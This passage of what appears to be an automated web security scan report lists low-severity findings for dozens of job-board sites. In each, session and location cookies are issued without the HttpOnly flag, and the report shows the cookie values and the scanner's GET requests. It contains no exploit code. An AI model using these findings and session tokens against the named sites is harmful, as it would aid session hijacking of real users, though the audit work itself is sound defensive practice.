Host:	http://www.businessdevelopmentcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.29. http://www.callcentercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.callcentercrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.30. http://www.chefcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.chefcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.31. http://www.civilengineeringcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.civilengineeringcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.32. http://www.clevelcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.clevelcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.33. http://www.clinicalresearchcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.clinicalresearchcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.34. http://www.compliancecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.compliancecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.35. http://www.computeraideddesigncrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.computeraideddesigncrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.36. http://www.constructioncrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.constructioncrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.37. http://www.consultingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.consultingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.38. http://www.contractmanagementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.contractmanagementcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.39. http://www.counselingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.counselingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.40. http://www.cpluspluscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cpluspluscrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.41. http://www.customerservicecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.customerservicecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.42. http://www.dbacrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dbacrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.43. http://www.dentalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dentalcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.44. http://www.designingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.designingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.45. http://www.directstartv.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.46. http://www.diversitycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.diversitycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.47. http://www.dotnetcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dotnetcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.48. http://www.ecommercecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ecommercecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.49. http://www.edfed.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.edfed.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=esnafiva63v7f9obfldsvpdko0; path=/; domain=edfed.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.50. http://www.editingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.editingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.51. http://www.educationcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.educationcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.52. http://www.employmentauthority.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.employmentauthority.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/
PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.53. http://www.employmentcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.employmentcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.54. http://www.energycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.energycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.55. http://www.engineeringcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.engineeringcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.56. http://www.entrylevelcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.entrylevelcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.57. http://www.environmentalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.environmentalcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.58. http://www.environmentalsafetyhealthcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.environmentalsafetyhealthcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.59. http://www.erpcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.erpcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.60. http://www.execcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.execcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.61. http://www.facilitiescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.facilitiescrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
